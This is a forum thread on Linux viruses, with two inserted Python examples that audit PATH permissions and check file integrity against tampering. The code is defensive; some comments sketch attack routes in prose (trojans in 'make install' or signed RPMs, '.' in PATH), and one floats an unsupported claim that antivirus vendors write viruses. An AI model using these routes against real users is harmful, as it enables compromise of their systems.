Re:*nix and Viruses (Score:2)
Windoze viruses spread so fast because the users let them - put a windows user on a linux box, and a virus will spread as fast there as it did under windows.
I am responsible for virus control at the company I work for, and the number of users who will blindly answer "yes" to anything that appears on their screen is staggering - particularly on occasion if I am standing there watching them, having just told them off for getting the LAST infestation. Thank $DEITY at least SOME of my users have gotten the basic idea
--
It's naive to think it can't happen. (Score:2)
--
One point that has been missed here (Score:2)
However, most newbies don't run any binaries (or even scripts) that they have write access to! How is a file infector going to work if all their executables are owned by root and they don't have write access?
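The precondition stated above (a file infector needs an executable the user can write) and the "." in your PATH remark in a later comment are both things you can check mechanically. What follows is an added example, not code from the thread: a Python audit that walks a PATH string the way the shell does and reports relative entries, PATH directories the caller could drop a shadowing binary into, and executables the caller could overwrite. The mode-bit check is the classic owner/group/other test and deliberately ignores POSIX ACLs and root's bypass; the directories and files in `demo()` are constructed fixtures.

```python
import os
import stat
import tempfile


def path_entries(path_var):
    """Split PATH as the shell does: an empty entry ("a::b" or a trailing ':') means the cwd."""
    return [p if p else "." for p in path_var.split(os.pathsep)]


def writable_by(st, uid, gids):
    """Unix permission semantics: the owner class wins if it matches, then group, then other.
    ACLs are not consulted and root (uid 0) is not special-cased: this is an audit of
    what an unprivileged account could do, not an authoritative access() call."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_path(path_var, uid=None, gids=None):
    """Return the three findings a file infector (or a PATH-shadowing trojan) would need."""
    uid = os.getuid() if uid is None else uid
    gids = (set(os.getgroups()) | {os.getgid()}) if gids is None else set(gids)
    out = {"relative_entries": [], "writable_dirs": [], "writable_executables": []}
    for d in path_entries(path_var):
        if not os.path.isabs(d):
            out["relative_entries"].append(d)      # lookup is controlled by whoever owns the cwd
            continue
        try:
            if writable_by(os.stat(d), uid, gids):
                out["writable_dirs"].append(d)     # a new "ls" dropped here shadows the real one
            with os.scandir(d) as it:
                entries = sorted(it, key=lambda e: e.name)
        except OSError:
            continue                               # missing dir or no permission: nothing to infect
        for e in entries:
            try:
                st = e.stat()                      # follows symlinks: the target is what gets written
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111 and writable_by(st, uid, gids):
                out["writable_executables"].append(e.path)
    return out


def demo():
    """Constructed fixture: one read-only bin dir, one writable bin dir, and a trailing ':'."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    good, bad = os.path.join(root, "bin-ro"), os.path.join(root, "bin-rw")
    os.mkdir(good)
    os.mkdir(bad)
    tools = {}
    for d, mode in ((good, 0o555), (bad, 0o755)):
        tools[d] = os.path.join(d, "ls")
        with open(tools[d], "w") as fh:
            fh.write("#!/bin/sh\necho not-really-ls\n")
        os.chmod(tools[d], mode)
    os.chmod(good, 0o555)                          # nobody can drop files into the read-only dir
    path_var = os.pathsep.join([good, bad, ""])    # trailing empty entry == "."
    return {"findings": audit_path(path_var), "writable_dir": bad, "writable_tool": tools[bad]}


if __name__ == "__main__":
    print(demo()["findings"])
    print(audit_path(os.environ.get("PATH", "")))  # the real thing, for the account running it
```

Run as an ordinary user, an empty result for the real PATH is the state the comment above describes; anything in `writable_executables` is exactly the file an infector would patch, and anything in `writable_dirs` or `relative_entries` is the cheaper trojan route that needs no infection at all.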
Re:Linux proto viruses (Score:2)
Seriously, simply tossing in tripwire (and kin) is *not* adequate -- and in fact it leads to a false sense of security. The problem is that anyone with root access could modify the files, reinitialize the database, and the changes are undetectable.
Even if your database is safe (e.g., CD-R, or r/o NFS directory), are you sure that tripwire hasn't been tampered with? That the crontab entry hasn't been tampered with? That the tripwire reports aren't disappearing down a rabbit hole?
Don't get me wrong - tripwire is an extremely valuable tool, but unless the sysadmin knows what they're doing it can be easily circumvented by any knowledgeable person with root access. Or by any script writer who knows how to check for the existence of local tripwire databases, for the times it runs as root and can do something nasty.
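An added example, not from the thread or from the Tripwire project, covering the "One word: Tripwire" suggestion and the re-baselining problem raised in the comment above. It is a minimal Python integrity checker (SHA-256 plus the metadata an attacker usually has to touch) and a `demo()` that walks through both halves of the argument: tampering is caught against the original database, an attacker with root who rewrites the database hides the change from the on-box check, and a short fingerprint of the database kept somewhere the host cannot write still exposes the rewrite. The file and the "injected payload" are constructed by the script; the fingerprint scheme is this example's own, not Tripwire's.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(paths):
    """Record digest, size, mode and owner: the attributes a trojaned binary usually changes."""
    db = {}
    for p in paths:
        st = os.stat(p)
        db[p] = {"sha256": file_digest(p), "size": st.st_size,
                 "mode": st.st_mode, "uid": st.st_uid}
    return db


def verify(db):
    """Return {path: [changed attributes]}; an empty dict means everything matches."""
    changed = {}
    for p, rec in db.items():
        if not os.path.exists(p):
            changed[p] = ["missing"]
            continue
        st = os.stat(p)
        diffs = []
        if file_digest(p) != rec["sha256"]:
            diffs.append("sha256")
        if st.st_size != rec["size"]:
            diffs.append("size")
        if st.st_mode != rec["mode"]:
            diffs.append("mode")
        if st.st_uid != rec["uid"]:
            diffs.append("uid")
        if diffs:
            changed[p] = diffs
    return changed


def fingerprint(db):
    """One hash over the canonical database. Write it down, mail it off-box, anything the
    compromised host cannot alter; it is the only part of this scheme root cannot rewrite."""
    return hashlib.sha256(json.dumps(db, sort_keys=True).encode()).hexdigest()


def demo():
    root = tempfile.mkdtemp(prefix="integ-")
    tool = os.path.join(root, "ls")                          # constructed stand-in for /bin/ls
    with open(tool, "wb") as fh:
        fh.write(b'#!/bin/sh\nexec /bin/ls "$@"\n')
    os.chmod(tool, 0o755)

    db = baseline([tool])
    fp = fingerprint(db)                                     # the copy that leaves the box
    clean = verify(db)                                       # {}

    with open(tool, "ab") as fh:                             # constructed tampering
        fh.write(b"\n# injected payload\n")
    detected = verify(db)                                    # {tool: ["sha256", "size"]}

    rebased = baseline([tool])                               # root re-initialises the database
    hidden = verify(rebased)                                 # {} : the on-box check is blind
    caught = fingerprint(rebased) != fp                      # True: the off-box fingerprint is not
    return {"clean": clean, "detected": detected, "hidden": hidden,
            "caught": caught, "tool": tool}


if __name__ == "__main__":
    print(demo())
```

The design point is the one the comment makes: everything that lives on the host (the database, the checker, the cron entry that runs it, the report) is inside root's reach, so the check is only as trustworthy as the one value you keep outside that reach and compare by hand.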
Bill in Jail! (Score:2)
Re:Linux is a virus in itself (Score:2)
Take a look at muLinux (search fm, forgot the URL). On one floppy, it contains a large number of server daemons, plus a fair amount of small apps. Add another floppy, and you have X11 with a simple graphical browser and choice of 3 windowmanagers. Add another - extra kernel modules, scsi, and other goodies. Another - GCC and headers. A 5th - x/svncviewer. The sixth floppy has Tcl/Tk. Each floppy is 1722k, so that adds up to... 10332k - a little over 10M. Windows can't TOUCH that amount of functionality in that little space.
"If ignorance is bliss, may I never be happy.
How about Emacs? (Score:2)
:-)
Cheers,
Ben
Re:yeah...ummm (Score:2)
--
linuxisgood:~$ man woman
Re:yeah...ummm (Score:2)
Indeed.
It is also important to consider the security advantage of a separate /var partition, since this is where logs go. Allowing an attacker to fill your root partition with log info would likely be very bad.
What protects us... (Score:2)
Viruses are on the way, and will most likely be even more attractive for Linux than WinXX. By writing a WinXX virus, I have to fool a virus checker, and even then I can generally only affect the clients of an organization. And if you have the "." in your path?? You're a great target. Plus, I can just start taking out your linux machines, your print servers, your databases, have a trojan report back keystrokes and network stats until it blows up?? Doable. And the virus will most likely not be open source.
Plus, what about companies like Norton?? I have this sneaking suspicion that they actually create some of these viruses, both to increase the value of their own product, and to devalue the product of a competitor. (You'd be surprised at the viruses I've seen that only one virus checker can find when they all have updated defs.) I know that this delves into the realm of conspiracy theory, but if there's a Dr. Solomon's for linux, there will have to be a virus for it to find. And if linux gets a good mindshare....
P.S. I wrote quite a bit of Unix virii back in the day, and it ain't that difficult.
Just My 0.02
Jason
Re:DUH... (Score:2)
No, all you need to do is trick the user into running something as root. For instance, offering him some nice looking software, and infect the system during "make install". You might even wrap it in a PGP signed RPM, with available fingerprints, and do the same trick when the RPM is installed.
-- Abigail
Re:Security Philosophy is Paramount (Score:2)
I beg to differ. That would be just too damn annoying for people who do know what they are doing. And for people who don't, well, tough luck. People with no Unix experience shouldn't admin a Unix box - let alone install a Unix system. Either get experience as a user, or just run Windows. That's why M$ exists.
-- Abigail
Re:HUMOR:Linux is a virus in itself (Score:2)
You'd think somebody (those other guys) forgot to include humor.h, or somebody urinated in their Cheerios this morning.
Re:*nix and Viruses (Score:2)
No, not at all. It just means that you shouldn't expect moving them to Linux will wave a magic wand and keep them safe from all harm.
Or at least until they've had you/me/someone else clueful, giving them a good training course? (I'm tempted to add 'with a cattle prod' but shall refrain... erm, oops :) :+)
Wristbands, and feedback software that jolts them every time they Luse
--
Re:Security Philosophy is Paramount (Score:2)
Well, duh, I don't.
I want to learn Linux, but because of the great wisdom of Abigail, I shouldn't install it, I should get experience as a user.
I dunno. Do you think the best way to learn how to fly is to buy a plane and just take off? Or would you start with making yourself more familiar with flying planes under the supervision of someone who knows how to fly?
-- Abigail
Re:Security Philosophy is Paramount (Score:2)
Screwing up gives Linux and Unix a bad name, people not knowing what they do flood IRC and Usenet channels with noise, and they give script kiddies many opportunities.
-- Abigail